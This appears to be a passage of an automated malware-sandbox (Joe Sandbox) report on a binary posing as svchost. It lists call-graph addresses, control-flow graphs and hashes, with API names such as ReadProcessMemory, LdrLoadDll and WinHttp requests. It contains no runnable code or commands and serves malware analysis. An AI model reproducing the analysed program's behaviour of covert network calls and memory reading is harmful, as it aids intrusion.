140013b00 ReadProcessMemory 9357->9358 9359 140012289 9358->9359 9359->9347 9360 140013b00 ReadProcessMemory 9359->9360 9360->9347 9362 140012421 9361->9362 9363 1400123dd 9361->9363 9362->9322 9363->9362 9364 140013800 13 API calls 9363->9364 9365 140012407 HeapFree 9364->9365 9365->9362 9367 140011125 9366->9367 9368 140011158 9366->9368 9369 140011130 SysFreeString SysFreeString 9367->9369 9370 14001116b HeapFree 9368->9370 9371 14001117d 9368->9371 9369->9368 9369->9369 9370->9371 9371->9016 9373 1400111a5 9372->9373 9374 1400111d8 9372->9374 9375 1400111b0 SysFreeString SysFreeString 9373->9375 9376 1400111eb HeapFree 9374->9376 9377 1400111fd 9374->9377 9375->9374 9375->9375 9376->9377 9377->9018 9381 140007000 9378->9381 9379 14000711f 9379->8483 9379->8484 9380 14000710f CryptReleaseContext 9380->9379 9382 14000e580 10 API calls 9381->9382 9384 1400070d2 9381->9384 9383 1400070a2 9382->9383 9383->9384 9385 1400070d9 HeapFree 9383->9385 9384->9379 9384->9380 9385->9384 9387 1400042d2 ??3@YAXPEAX 9386->9387 9388 1400042cc 9386->9388 9387->8509 9388->9387 9390 14000e580 10 API calls 9389->9390 9393 140007262 9390->9393 9391 1400026ab 9391->8517 9391->8532 9392 140006fb0 12 API calls 9392->9393 9393->9391 9393->9392 9394 1400072ec 9393->9394 9395 14000730e HeapFree 9394->9395 9396 1400072fe HeapFree 9394->9396 9395->9391 9396->9395 9401 1400073a0 9397->9401 9398 1400074aa 9399 140002703 9398->9399 9400 1400074e8 CryptReleaseContext 9398->9400 9399->8532 9407 140006d20 9399->9407 9400->9399 9401->9398 9402 14000e580 10 API calls 9401->9402 9403 140007464 9402->9403 9403->9398 9404 14000746c memcpy 9403->9404 9405 1400074a6 9404->9405 9405->9398 9406 1400074b1 HeapFree 9405->9406 9406->9398 9409 140006d75 9407->9409 9408 14000272a 9408->8528 9408->8529 9408->8532 9409->9408 9410 140006fb0 12 API calls 9409->9410 9411 140006dba 9410->9411 9412 14000e0c0 2 API calls 9411->9412 9418 140006eb9 9411->9418 9414 140006dd7 9412->9414 9413 140006f7c HeapFree 9413->9408 9415 14000e0c0 2 API calls 9414->9415 9414->9418 9416 140006e37 9415->9416 9417 14000e0c0 2 API calls 9416->9417 9416->9418 9417->9418 9418->9408 9418->9413 9420 14000e580 10 API calls 9419->9420 9421 140007560 9420->9421 9422 14000758e HeapFree 9421->9422 9423 140007584 9421->9423 9422->9423 9423->8532 9438 14000c8c0 9424->9438 9427 14000e580 10 API calls 9430 140005b26 9427->9430 9428 140005baa 9429 140005be4 HeapFree 9428->9429 9432 140005bf9 9428->9432 9434 140005bcd HeapFree 9428->9434 9429->9432 9430->9428 9435 14000e0c0 2 API calls 9430->9435 9431 140005c15 9431->8649 9432->9431 9433 140005c02 HeapFree 9432->9433 9433->9431 9434->9428 9436 140005b46 9435->9436 9437 140002880 _vsnwprintf 9436->9437 9437->9428 9440 14000c8f5 9438->9440 9439 140005b08 9439->9427 9439->9428 9440->9439 9441 14000e580 10 API calls 9440->9441 9441->9440 9460 1400162a0 9442->9460 9444 1400168c5 9444->8664 9445 140016806 9445->9444 9446 140016827 _time64 9445->9446 9447 1400168b0 HeapFree 9445->9447 9446->9447 9448 14001683c 9446->9448 9447->9444 9473 140015c30 9448->9473 9450 14001684c 9451 14000ef60 25 API calls 9450->9451 9458 140016898 9450->9458 9452 14001685c ??3@YAXPEAX 9451->9452 9485 140015cf0 9452->9485 9455 140016878 _time64 9455->9458 9456 14001689a 9457 14000ef60 25 API calls 9456->9457 9459 1400168a2 ??3@YAXPEAX 9457->9459 9458->9447 9459->9458 9461 14000e0c0 2 API calls 9460->9461 9462 1400162c6 9461->9462 9463 14000e0c0 2 API calls 9462->9463 9464 14001630d 9463->9464 9465 140002880 _vsnwprintf 9464->9465 9466 14001636d 9465->9466 9467 1400163cb 9466->9467 9468 14000e580 10 API calls 9466->9468 9467->9445 9469 14001637d 9468->9469 9469->9467 9470 140016385 GetFullPathNameW 9469->9470 9471 1400163a2 9470->9471 9472 1400163b6 HeapFree 9470->9472 9471->9445 9472->9467 9474 1400162a0 13 API calls 9473->9474 9475 140015c45 9474->9475 9476 140015c51 ??2@YAPEAX_K 9475->9476 9477 140015ce5 9475->9477 9478 140015c66 9476->9478 9477->9450 9479 14000f120 30 API calls 9478->9479 9480 140015c87 HeapFree 9479->9480 9481 140015cd2 9480->9481 9482 140015caa 9480->9482 9481->9450 9482->9481 9483 14000ef60 25 API calls 9482->9483 9484 140015cb7 ??3@YAXPEAX 9483->9484 9484->9450 9486 1400075c0 60 API calls 9485->9486 9487 140015d27 9486->9487 9488 140015ec5 9487->9488 9489 14000caf0 11 API calls 9487->9489 9490 140015eda HeapFree 9488->9490 9491 140015eec 9488->9491 9492 140015d40 9489->9492 9490->9491 9493 140015ef1 HeapFree 9491->9493 9494 140015f06 9491->9494 9496 140015d62 9492->9496 9497 140015d52 HeapFree 9492->9497 9493->9494 9495 140015f32 9494->9495 9500 14000ef60 25 API calls 9494->9500 9498 140007740 43 API calls 9495->9498 9499 14000caf0 11 API calls 9496->9499 9497->9496 9501 140015f3c 9498->9501 9506 140015d6a 9499->9506 9502 140015f27 ??3@YAXPEAX 9500->9502 9501->9455 9501->9456 9502->9495 9503 140015dbd HeapFree 9503->9506 9504 140015eb0 HeapFree 9504->9488 9505 14000a3d0 25 API calls 9505->9506 9506->9503 9506->9505 9507 14000a230 16 API calls 9506->9507 9508 14000d5a0 13 API calls 9506->9508 9509 140015f48 9506->9509 9519 140015e84 9506->9519 9507->9506 9508->9506 9510 140015f64 ??2@YAPEAX_K 9509->9510 9509->9519 9511 140015f74 9510->9511 9512 140002660 23 API calls 9511->9512 9513 140015fb7 9512->9513 9514 14000fca0 14 API calls 9513->9514 9513->9519 9515 140015fc3 9514->9515 9516 140015fd6 SysAllocString 9515->9516 9517 140015fd0 SysFreeString 9515->9517 9515->9519 9518 1400162a0 13 API calls 9516->9518 9517->9516 9518->9519 9519->9488 9519->9504 9671 140009430 9520->9671 9522 140009178 9523 140009205 9522->9523 9526 140007c4b 9522->9526 9528 14000bd60 18 API calls 9522->9528 9524 1400092c2 9523->9524 9525 1400092ad HeapFree 9523->9525 9524->9526 9527 1400092c7 HeapFree 9524->9527 9525->9524 9526->8168 9527->9526 9529 14000919e 9528->9529 9530 14000e0c0 2 API calls 9529->9530 9530->9523 9735 1400186a0 9531->9735 9533 14000980f memset memset 9534 1400098fa 9533->9534 9535 14000989e 9533->9535 9537 14000c8c0 10 API calls 9534->9537 9536 14000e0c0 2 API calls 9535->9536 9538 1400098b9 9536->9538 9539 14000990f 9537->9539 9540 14000e580 10 API calls 9538->9540 9541 14000a00c 9539->9541 9548 140009923 9539->9548 9665 1400098c4 memcpy 9540->9665 9542 14000e0c0 2 API calls 9541->9542 9544 14000a01f 9542->9544 9543 1400099d7 9545 14000bfe0 11 API calls 9543->9545 9546 14000e580 10 API calls 9544->9546 9547 1400099f2 9545->9547 9546->9665 9549 140009a06 9547->9549 9550 1400099f6 9547->9550 9548->9543 9552 1400099c5 9548->9552 9553 14000998e 9548->9553 9737 140014f70 9549->9737 9554 14000dfe0 10 API calls 9550->9554 9559 14000dfe0 10 API calls 9552->9559 9555 140007150 11 API calls 9553->9555 9554->9665 9560 1400099a5 9555->9560 9557 14000a104 HeapFree 9558 14000a116 9557->9558 9562 14000a122 HeapFree 9558->9562 9563 14000a134 9558->9563 9559->9665 9560->9543 9564 1400099a9 9560->9564 9562->9563 9566 14000a141 9563->9566 9568 14000caf0 11 API calls 9563->9568 9567 14000dfe0 10 API calls 9564->9567 9565 14000e0c0 2 API calls 9586 140009a28 9565->9586 9569 14000caf0 11 API calls 9566->9569 9572 14000a163 9566->9572 9567->9665 9568->9566 9569->9572 9570 14000a1a3 9573 14000a1ad HeapFree 9570->9573 9574 14000a1bf 9570->9574 9572->9570 9577 14000a189 HeapFree 9572->9577 9573->9574 9578 14000a1c9 HeapFree 9574->9578 9579 14000a1db 9574->9579 9575 140009aa3 9583 14000bfe0 11 API calls 9575->9583 9577->9572 9578->9579 9580 14000a1f5 9579->9580 9581 14000a1e0 HeapFree 9579->9581 9584 14000a214 9580->9584 9585 14000a1ff HeapFree 9580->9585 9581->9580 9582 140009b0c 9587 14000dfe0 10 API calls 9582->9587 9588 140009ab8 9583->9588 9584->8680 9585->9584 9586->9575 9597 140009aee 9586->9597 9742 140012430 9586->9742 9587->9665 9589 140009b21 9588->9589 9590 140009abc 9588->9590 9593 140015930 27 API calls 9589->9593 9594 14000dfe0 10 API calls 9590->9594 9596 140009b34 9593->9596 9594->9665 9598 140009b38 9596->9598 9599 140009b4d 9596->9599 9753 140015040 9597->9753 9601 14000dfe0 10 API calls 9598->9601 9600 14000e0c0 2 API calls 9599->9600 9602 140009b60 9600->9602 9601->9665 9603 140009b76 9602->9603 9604 140009dab 9602->9604 9609 140009bb7 9602->9609 9603->8680 9606 14000e0c0 2 API calls 9604->9606 9605 140009bc2 9775 14000f090 9605->9775 9607 140009dbe 9606->9607 9622 140009e13 9607->9622 9629 140009e86 9607->9629 9609->9605 9611 140009bf4 9609->9611 9612 140009c0f 9609->9612 9610 140009bce 9613 140009bd2 9610->9613 9614 140009c20 9610->9614 9615 140009c13 9611->9615 9616 140009bfa 9611->9616 9612->9615 9617 140009c7d 9612->9617 9619 14000caf0 11 API calls 9613->9619 9618 140009c55 9614->9618 9624 140011c80 59 API calls 9614->9624 9782 14000f1d0 9615->9782 9621 14000dfe0 10 API calls 9616->9621 9620 14000e580 10 API calls 9617->9620 9625 14000dfe0 10 API calls 9618->9625 9618->9665 9619->9665 9634 140009c89 9620->9634 9621->9665 9626 140009e1b 9622->9626 9627 140009e3c 9622->9627 9624->9618 9625->9665 9628 14000dfe0 10 API calls 9626->9628 9631 140009e48 9627->9631 9632 140009e5d 9627->9632 9630 140009e23 9628->9630 9633 140009eae 9629->9633 9635 140009f0a 9629->9635 9637 14000f1d0 13 API calls 9629->9637 9640 140015150 30 API calls 9630->9640 9636 14000dfe0 10 API calls 9631->9636 9639 140012430 13 API calls 9632->9639 9638 14000f090 47 API calls 9633->9638 9644 14000e0c0 2 API calls 9634->9644 9634->9665 9645 140011fe0 18 API calls 9635->9645 9641 140009e50 9636->9641 9637->9633 9642 140009ebd 9638->9642 9643 140009e69 9639->9643 9640->9665 9646 14000f1d0 13 API calls 9641->9646 9642->9613 9647 140009ec5 9642->9647 9648 140015150 30 API calls 9643->9648 9644->9665 9649 140009f58 9645->9649 9646->9630 9647->9618 9655 140011c80 59 API calls 9647->9655 9648->9665 9650 140009f71 9649->9650 9651 140009f5c 9649->9651 9653 140009f96 9650->9653 9654 140009f7d HeapFree 9650->9654 9652 14000dfe0 10 API calls 9651->9652 9652->9665 9656 14000e580 10 API calls 9653->9656 9654->9653 9657 140009f01 9655->9657 9658 140009fa7 9656->9658 9657->9618 9657->9635 9659 140009fd2 memcpy 9658->9659 9660 140009fb0 9658->9660 9662 1400123d0 14 API calls 9659->9662 9661 14000dfe0 10 API calls 9660->9661 9663 140009fb8 9661->9663 9662->9665 9664 1400123d0 14 API calls 9663->9664 9664->9665 9665->9557 9665->9558 9667 140009430 36 API calls 9666->9667 9668 140009334 9667->9668 9669 1400093f8 HeapFree 9668->9669 9670 140007c7f 9668->9670 9669->9670 9670->8168 9672 140009482 9671->9672 9673 140009499 9671->9673 9672->9522 9674 1400094de 9673->9674 9675 14000e580 10 API calls 9673->9675 9674->9522 9676 14000950b 9675->9676 9676->9674 9677 140009793 HeapFree 9676->9677 9697 140007150 9676->9697 9677->9674 9679 1400097ad HeapFree 9677->9679 9679->9674 9680 14000954e 9680->9677 9682 140006d20 13 API calls 9683 1400095ec 9682->9683 9683->9680 9684 14000e580 10 API calls 9683->9684 9685 14000960c 9684->9685 9685->9680 9686 14000e0c0 2 API calls 9685->9686 9687 14000964c 9686->9687 9703 1400179c0 memset WinHttpCrackUrl 9687->9703 9690 14000ce20 11 API calls 9691 1400096c9 9690->9691 9692 140006fb0 12 API calls 9691->9692 9696 1400096d2 9691->9696 9692->9696 9693 140009764 HeapFree 9694 140009779 9693->9694 9694->9677 9695 14000977e HeapFree 9694->9695 9695->9677 9696->9693 9696->9694 9698 14000719d 9697->9698 9699 1400071ff 9698->9699 9700 14000e580 10 API calls 9698->9700 9699->9680 9699->9682 9701 1400071b1 9700->9701 9701->9699 9702 1400071ec HeapFree 9701->9702 9702->9699 9704 140017a41 9703->9704 9705 1400096a7 9703->9705 9704->9705 9706 14000e580 10 API calls 9704->9706 9705->9680 9705->9690 9707 140017a5f 9706->9707 9707->9705 9708 14000e580 10 API calls 9707->9708 9713 140017a87 9708->9713 9709 140017d4b HeapFree 9710 140017d65 HeapFree 9709->9710 9711 140017d7a 9709->9711 9710->9711 9711->9705 9712 140017d87 HeapFree 9711->9712 9712->9705 9713->9709 9714 14000e0c0 2 API calls 9713->9714 9715 140017ad2 WinHttpOpen 9714->9715 9717 140017d43 9715->9717 9718 140017b2b WinHttpSetTimeouts WinHttpConnect 9715->9718 9717->9709 9719 140017d3a WinHttpCloseHandle 9718->9719 9720 140017b6c 9718->9720 9719->9717 9721 14000e0c0 2 API calls 9720->9721 9724 140017b7f 9721->9724 9722 140017bd9 WinHttpOpenRequest 9725 140017c02 WinHttpSendRequest 9722->9725 9726 140017d2c 9722->9726 9723 140017d31 WinHttpCloseHandle 9723->9719 9724->9722 9724->9723 9727 140017d23 WinHttpCloseHandle 9725->9727 9728 140017c28 WinHttpReceiveResponse 9725->9728 9726->9723 9727->9726 9728->9727 9729 140017c3b WinHttpQueryHeaders 9728->9729 9729->9727 9733 140017c74 9729->9733 9730 140017c90 WinHttpQueryDataAvailable 9730->9727 9730->9733 9731 140017d07 9731->9727 9732 14000e580 10 API calls 9732->9733 9733->9727 9733->9730 9733->9731 9733->9732 9734 140017cea WinHttpReadData 9733->9734 9734->9727 9734->9733 9736 1400186ca 9735->9736 9736->9533 9788 140016140 9737->9788 9739 140009a12 9739->9565 9740 140014f8d 9740->9739 9741 140015010 HeapFree 9740->9741 9741->9739 9743 140009add 9742->9743 9744 140012442 9742->9744 9748 140015150 9743->9748 9745 140013800 13 API calls 9744->9745 9746 14001245a 9745->9746 9747 140013650 13 API calls 9746->9747 9747->9743 9749 140014f70 13 API calls 9748->9749 9750 140015164 9749->9750 9751 140015174 9750->9751 9799 1400168e0 9750->9799 9751->9597 9754 140014f70 13 API calls 9753->9754 9755 140015065 9754->9755 9756 140009b04 9755->9756 9757 140016140 12 API calls 9755->9757 9756->9575 9756->9582 9758 14001507b 9757->9758 9758->9756 9759 1400150a3 9758->9759 9809 140016470 9758->9809 9761 140015cf0 125 API calls 9759->9761 9774 1400150da 9759->9774 9763 1400150b6 9761->9763 9766 14001510b HeapFree 9763->9766 9768 140016470 14 API calls 9763->9768 9763->9774 9764 1400163e0 10 API calls 9767 1400150f1 9764->9767 9765 140015c30 51 API calls 9765->9759 9766->9756 9769 1400150f5 9767->9769 9770 14000ef60 25 API calls 9767->9770 9771 1400150cb 9768->9771 9769->9766 9773 140015102 ??3@YAXPEAX 9770->9773 9771->9766 9772 140015c30 51 API calls 9771->9772 9772->9774 9773->9766 9774->9764 9774->9766 9776 14000f0a5 9775->9776 9777 14000f0f6 9775->9777 9778 14000e0c0 2 API calls 9776->9778 9779 140011210 47 API calls 9777->9779 9781 14000f0b6 9778->9781 9780 14000f102 9779->9780 9780->9610 9781->9610 9783 14000f1ef 9782->9783 9784 14000f24c 9782->9784 9783->9784 9785 140013800 13 API calls 9783->9785 9784->9605 9786 14000f244 9785->9786 9787 140013650 13 API calls 9786->9787 9787->9784 9789 140016157 9788->9789 9790 14001628a 9789->9790 9791 14000e580 10 API calls 9789->9791 9790->9740 9792 1400161ca 9791->9792 9793 14001624c 9792->9793 9794 14000e0c0 2 API calls 9792->9794 9793->9740 9795 1400161ea 9794->9795 9796 140002880 _vsnwprintf 9795->9796 9797 140016248 9796->9797 9797->9793 9798 140016270 HeapFree 9797->9798 9798->9793 9800 140016910 9799->9800 9801 14001694d 9800->9801 9802 14000ef60 25 API calls 9800->9802 9803 14001698e 9800->9803 9804 140016999 9801->9804 9805 14001697e 9801->9805 9806 140016944 ??3@YAXPEAX 9802->9806 9803->9751 9804->9803 9808 1400169a2 HeapFree 9804->9808 9807 14000e580 10 API calls 9805->9807 9806->9801 9807->9803 9808->9803 9810 1400162a0 13 API calls 9809->9810 9812 140016481 9810->9812 9811 140015094 9811->9759 9811->9765 9812->9811 9813 1400164a7 HeapFree 9812->9813 9813->9811 8068 1dd0ee20000 8069 1dd0ee20020 8068->8069 8070 1dd0ee201a1 8069->8070 8071 1dd0ee200b1 LdrLoadDll 8069->8071 8071->8069
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$FreeLibrary$??2@HeapLoad$Initialize_time64$CountCreateCurrentDirectoryInstanceSecuritySleepTickUninitializememsetsrand
          • String ID:
          • API String ID: 2921336483-0
          • Opcode ID: a823052580928bd824f163ca6e897ae67aad89d72ca9790ee6e18b48b9a0a523
          • Instruction ID: 68504463b67ef1b29f9b7d47820dd4a867066b0ffea43447dab23e93c07c9791
          • Opcode Fuzzy Hash: a823052580928bd824f163ca6e897ae67aad89d72ca9790ee6e18b48b9a0a523
          • Instruction Fuzzy Hash: 7C923BB2604B8585EB62DF22E8503ED37A4F788BC8F444426EB4A57BB9DF39C945C740

          Control-flow Graph

          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$LibraryLoad$memset
          • String ID:
          • API String ID: 2529764867-0
          • Opcode ID: e0cf9d58dca152765d060bada16e2a2e5b7f9f137bbe49111f327c7c28c01f36
          • Instruction ID: 5d690c7c490bd090bdbf8754a9ee11121f4ef864398ce79e0bcd1f78a3723631
          • Opcode Fuzzy Hash: e0cf9d58dca152765d060bada16e2a2e5b7f9f137bbe49111f327c7c28c01f36
          • Instruction Fuzzy Hash: 2A911871615B8585EA23DB16F8603E933B0FB8C7C8F44142AA78D4B67AEF79D905CB40

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 140001080-140001139 2 1400016ac-1400016b6 0->2 3 14000113f-14000114e ??2@YAPEAX_K@Z 0->3 6 1400016b8 2->6 7 1400016be-1400016c8 2->7 4 140001154-140001172 SysAllocString 3->4 5 140001716-140001720 call 1400183b0 3->5 8 140001174-14000117e call 1400183b0 4->8 9 14000117f-1400011a3 4->9 6->7 11 1400016d1-1400016d4 7->11 12 1400016ca 7->12 8->9 19 1400011a5-1400011ab 9->19 20 1400011cb-1400011cd 9->20 13 1400016d6-1400016e3 HeapFree 11->13 14 1400016e9-1400016ff 11->14 12->11 13->14 23 1400011b3-1400011ba 19->23 24 1400011ad SysFreeString 19->24 21 1400011d3-1400011e6 call 140001730 20->21 22 1400016a5 20->22 21->22 29 1400011ec-140001216 call 14000e0c0 21->29 22->2 26 1400011c2-1400011c5 ??3@YAXPEAX@Z 23->26 27 1400011bc ??_V@YAXPEAX@Z 23->27 24->23 26->20 27->26 32 140001236-140001263 call 14000e0c0 29->32 33 140001218 29->33 37 140001265 32->37 38 140001286-1400012e8 VariantInit * 2 SysAllocString 32->38 34 140001220-140001234 33->34 34->32 34->34 41 140001270-140001284 37->41 39 1400012f5-14000131f ??2@YAPEAX_K@Z 38->39 40 1400012ea-1400012f4 call 1400183b0 38->40 43 140001325-140001346 SysAllocString 39->43 44 14000170b-140001715 call 1400183b0 39->44 40->39 41->38 41->41 46 140001358-14000136c ??2@YAPEAX_K@Z 43->46 47 140001348-14000134b 43->47 44->5 51 140001372-140001390 SysAllocString 46->51 52 140001700-14000170a call 1400183b0 46->52 47->46 49 14000134d-140001357 call 1400183b0 47->49 49->46 55 140001392-14000139c call 1400183b0 51->55 56 14000139d-1400013fe 51->56 52->44 55->56 62 140001426-140001430 56->62 63 140001400-140001406 56->63 66 140001432-140001438 62->66 67 140001458-14000147a VariantClear * 3 62->67 64 140001408 SysFreeString 63->64 65 14000140e-140001415 63->65 64->65 68 140001417 ??_V@YAXPEAX@Z 65->68 69 14000141d-140001420 ??3@YAXPEAX@Z 65->69 70 14000143a SysFreeString 66->70 71 140001440-140001447 66->71 72 140001696 call 14000cc50 67->72 73 140001480-140001487 67->73 68->69 69->62 70->71 75 140001449 ??_V@YAXPEAX@Z 71->75 76 14000144f-140001452 ??3@YAXPEAX@Z 71->76 79 14000169b-14000169d 72->79 77 14000148d-14000149d call 140001730 73->77 78 14000169f 73->78 75->76 76->67 77->22 82 1400014a3-1400014cd call 14000e0c0 77->82 78->22 79->22 79->78 85 1400014e6-14000155a VariantInit * 3 call 140001000 82->85 86 1400014cf 82->86 90 140001561 85->90 91 14000155c-14000155f 85->91 87 1400014d0-1400014e4 86->87 87->85 87->87 92 140001564-140001575 ??2@YAPEAX_K@Z 90->92 91->92 93 14000168b-140001695 call 1400183b0 92->93 94 14000157b-140001599 SysAllocString 92->94 93->72 96 1400015a6-1400015fe 94->96 97 14000159b-1400015a5 call 1400183b0 94->97 102 140001626-14000162e 96->102 103 140001600-140001606 96->103 97->96 106 14000166b-140001689 VariantClear * 3 102->106 107 140001630-140001639 102->107 104 140001608 SysFreeString 103->104 105 14000160e-140001615 103->105 104->105 108 140001617 ??_V@YAXPEAX@Z 105->108 109 14000161d-140001620 ??3@YAXPEAX@Z 105->109 106->78 110 140001666 107->110 111 14000163b-14000163e 107->111 108->109 109->102 110->106 111->110 112 140001640-140001646 111->112 113 140001648 SysFreeString 112->113 114 14000164e-140001655 112->114 113->114 115 140001657 ??_V@YAXPEAX@Z 114->115 116 14000165d-140001660 ??3@YAXPEAX@Z 114->116 115->116 116->110
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: StringVariant$AllocClearFree$??2@??3@Init$ProcessToken$CurrentHeapInformationOpen
          • String ID:
          • API String ID: 932316019-0
          • Opcode ID: 4bd45e6a1165e3b44a20c2cec4adbc21042b19c0b393bff6292b254aae24aa57
          • Instruction ID: 73fd58dbfa8de5e771e7542bc31443fe366ed4c037a12749888c4d0630df74ea
          • Opcode Fuzzy Hash: 4bd45e6a1165e3b44a20c2cec4adbc21042b19c0b393bff6292b254aae24aa57
          • Instruction Fuzzy Hash: CE123F72601B8586EB26CF66E8503ED73B0FB98BC8F044115EF4A5BAA9DF79C645C340

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 469 140001730-140001785 470 140001821-14000184a 469->470 471 14000178b-1400017ca 469->471 474 140001bd9-140001be1 470->474 480 140001850-14000187e 470->480 471->474 475 1400017d0 471->475 477 140001be3 474->477 478 140001bf0-140001bf8 474->478 479 1400017d5-140001812 475->479 477->478 481 140001c07-140001c15 478->481 482 140001bfa 478->482 485 140001814-140001820 479->485 486 14000188d-1400018b5 479->486 480->474 487 140001884-140001888 480->487 482->481 488 140001922-14000192a 486->488 489 1400018b7-1400018bf 486->489 487->479 491 140001931-14000197a call 14000dfe0 call 14000e580 call 14000e050 * 2 488->491 492 14000192c 488->492 489->488 490 1400018c1-14000191c call 14000e580 memcpy * 2 489->490 490->488 503 1400019ca-140001a20 call 14000e050 * 2 _time64 _localtime64 call 14000e0c0 491->503 504 14000197c-140001995 call 14000e050 491->504 492->491 517 140001a25-140001a3c 503->517 510 1400019b3-1400019c7 call 14000e050 504->510 511 140001997 504->511 510->503 513 1400019a0-1400019b1 511->513 513->510 513->513 518 140001a56-140001a86 wcsftime 517->518 519 140001a3e 517->519 521 140001aa5-140001acb call 14000e050 518->521 522 140001a88 518->522 520 140001a40-140001a54 519->520 520->518 520->520 526 140001ae3-140001ae6 521->526 527 140001acd 521->527 523 140001a90-140001aa3 522->523 523->521 523->523 529 140001b37-140001b61 call 14000e050 call 14000bd60 526->529 530 140001ae8-140001b01 call 14000e050 526->530 528 140001ad0-140001ae1 527->528 528->526 528->528 542 140001b83-140001bd1 call 14000e050 HeapFree * 2 529->542 543 140001b63 529->543 535 140001b23-140001b33 call 14000e050 530->535 536 140001b03 530->536 535->529 538 140001b10-140001b21 536->538 538->535 538->538 542->474 544 140001b70-140001b81 543->544 544->542 544->544
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeapmemcpy$AddressLibraryLoadProc_localtime64_time64wcsftime
          • String ID: <
          • API String ID: 2118791860-4251816714
          • Opcode ID: bc341a25e09894bafeecd124b04850cfcfec052a11b0728d968ebb8a01a9e0fb
          • Instruction ID: 7b3512f6305f96da40dd492177f831db69bdef71e394fa92b440c6adabb0c7d5
          • Opcode Fuzzy Hash: bc341a25e09894bafeecd124b04850cfcfec052a11b0728d968ebb8a01a9e0fb
          • Instruction Fuzzy Hash: 3ED15176600B8586EB21DF26E4503EE73A0FB89BC8F544125EF8A47B69EF39C945C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 547 140017e00-140017e36 GetStartupInfoW 548 140017e39-140017e44 547->548 549 140017e46-140017e49 548->549 550 140017e60-140017e69 548->550 553 140017e53-140017e5e Sleep 549->553 554 140017e4b-140017e51 549->554 551 140017e75-140017e7d 550->551 552 140017e6b-140017e73 _amsg_exit 550->552 556 140017ed2 551->556 557 140017e7f-140017e9e 551->557 555 140017edc-140017ee5 552->555 553->548 554->550 559 140017f04-140017f07 555->559 560 140017ee7-140017efa _initterm 555->560 556->555 558 140017ea2-140017ea5 557->558 563 140017ec4-140017ec6 558->563 564 140017ea7-140017ea9 558->564 561 140017f13-140017f1a 559->561 562 140017f09-140017f0c 559->562 560->559 565 140017f1c-140017f2a call 140018208 561->565 566 140017f3b-140017f45 561->566 562->561 563->555 568 140017ec8-140017ecd 563->568 564->563 567 140017eab-140017eb1 564->567 565->566 577 140017f2c-140017f33 565->577 572 140017f51-140017f59 566->572 573 140017f47-140017f4c 566->573 570 140017eb3-140017eb5 567->570 571 140017eb9-140017ec2 567->571 574 140018024-14001803d 568->574 570->571 571->558 576 140017f5d-140017f61 572->576 573->574 579 140017f63-140017f66 576->579 580 140017fd6-140017fda 576->580 577->566 583 140017f68-140017f6a 579->583 584 140017f6c-140017f6f 579->584 581 140017fe9-140017ff2 580->581 582 140017fdc-140017fe5 580->582 581->574 581->576 582->581 583->580 583->584 585 140017f82-140017fb6 call 140002900 584->585 586 140017f71-140017f75 584->586 590 140017fb8-140017fba exit 585->590 591 140017fc0-140017fc6 585->591 586->585 587 140017f77-140017f80 586->587 587->584 590->591 592 140017fd4 591->592 593 140017fc8-140017fce _cexit 591->593 592->574 593->592
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
